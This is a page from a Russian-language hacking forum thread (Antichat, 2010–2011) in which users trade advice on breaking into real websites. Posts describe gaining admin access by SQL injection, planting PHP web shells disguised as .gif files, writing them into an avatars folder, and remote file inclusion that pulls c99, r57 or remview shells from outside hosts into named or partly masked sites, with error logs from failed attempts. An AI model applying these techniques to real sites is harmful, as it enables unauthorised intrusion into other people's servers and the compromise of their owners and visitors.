HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 24.08.2010, 01:00
Dedicat_seller
Новичок
Регистрация: 07.07.2010
Сообщений: 14
С нами: 8341526

Репутация: 2
По умолчанию

Цитата:

Сообщение от wolf295214

скачал этот w3af,но он не запускается.В чём проблемма?

Ты в сети бываеш когданить? Как с тобой связатся?
 
Ответить с цитированием

  #72  
Старый 07.09.2010, 01:00
sulikoshka
Постоянный
Регистрация: 26.04.2010
Сообщений: 459
С нами: 8445206

Репутация: 15
По умолчанию

Цитата:

Сообщение от rashin

как лутше на безопастность и на отаки проверить?

А это не одно и тоже :hmcool:
 
Ответить с цитированием

  #73  
Старый 10.11.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

unit08, очевидно, скачать этот файл :ag:
Инклуда там нет.
 
Ответить с цитированием

  #74  
Старый 10.11.2010, 01:00
unit08
Новичок
Регистрация: 04.11.2010
Сообщений: 4
С нами: 8168726

Репутация: 0
По умолчанию

а тут что можна сделать?
http://www.zwicky-stiftung.ch/index....u/c99shell.php
 
Ответить с цитированием

  #75  
Старый 24.11.2010, 01:00
1nt
Новичок
Регистрация: 09.04.2010
Сообщений: 0
С нами: 8468691

Репутация: 0
По умолчанию

день добрый. проблема заключается в следующем...
через sqli получил доступ к админке на сайт. админка самописная.
в ней можно добавлять так называемые модули.
добавил новый модуль, но вместо локальных скриптов кинул ссылку на файл такого типа: site.com/shell.php.gif
После перехода на модуль, шелл выполнился на сайте с этой самой админкой, но беда в том, что нет прав на запись. Да и при клацании кнопок шелла, тоесть при передаче скрипту каких-либо параметров скрипт просто сбрасывается и отображается главная страница сайта.
что можете посоветовать в этом случае?
З.Ы. Цель поместить шелл все таки в папку сайта, а не инклудить постоянно
На всякий случай еще допишу, что запись в файл через мускул тоже не работает

=====================================

Проблему решил, найдя каталог с аватарами, куда можно было записывать файлы, после чего через заинклуденный скрипт без проблем загрузил его же на сервер.

Добавлено через 10 часов 47 минут
Снова нужна помощь, теперь уже с другим сайтом.
есть инклуд в параметре ?url, только беда в том, что файл 1.php.gif пытается отобразиться как картика, 1.php.txt соответственно как текст. Файлы html тоже отображаются текстом, за исключением тега заднего фона. Печальная ситуация, может кто подскажет как быть?
 
Ответить с цитированием

  #76  
Старый 10.12.2010, 01:00
KGB
Участник форума
Регистрация: 06.12.2010
Сообщений: 129
С нами: 8122646

Репутация: 0
По умолчанию

Такой вопрос по php иньекциям: обязательно ли грузить remview.php на на народ, или можно указать к ней путь прямо у себя на диске?

Например: www.****.in.ua/?cat=D:\remview.php - открылась главная страница сайта.

И еще вопрос: уязвим ли сайт www.****.org/index.php?id=19&tx_ttnews[tt_news]=157&tx_ttnews[backPid]=1&cHash=a01ccef0ab ?

Когда пытаюсь загрузить на него шел с сайта http://kgb-hack.narod.ru/r57shell.php то открывается главная страница, почему?
 
Ответить с цитированием

  #77  
Старый 24.02.2011, 01:00
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
С нами: 9133839

Репутация: 85
По умолчанию

НЕзнаю туда или нет если что переместите!Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
 
Ответить с цитированием

  #78  
Старый 01.03.2011, 01:00
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
С нами: 9133839

Репутация: 85
По умолчанию

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Добавлено через 5 минут
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
 
Ответить с цитированием

  #79  
Старый 26.03.2011, 01:00
deviler435
Новичок
Регистрация: 04.05.2010
Сообщений: 6
С нами: 8433686

Репутация: 0
По умолчанию

капец полный все что здесь написано полное фуфло и не работает ни на одном сайте в 2011 году хоть какой шел заливай все ровно пишет Warning: displaycontent(inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php) [function.displaycontent]: failed to open stream: No such file or directory in /web/omronural/site/www/inc/setup.php on line 132

Warning: displaycontent(inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php) [function.displaycontent]: failed to open stream: No such file or directory in /web/omronural/site/www/inc/setup.php on line 132

Warning: displaycontent() [function.include]: Failed opening 'inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php' for inclusion (include_path='.:/usr/local/lib/php/') in /web/omronural/site/www/inc/setup.php on line 132

Добавлено через 3 минуты
и вообще сколько здесь материала бы не было не что не работает
 
Ответить с цитированием

  #80  
Старый 26.03.2011, 01:00
deviler435
Новичок
Регистрация: 04.05.2010
Сообщений: 6
С нами: 8433686

Репутация: 0
По умолчанию

похоже здесь не у одного меня такая проблема может тогда объяснишь почему не один сайт не взламывается этим методом
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.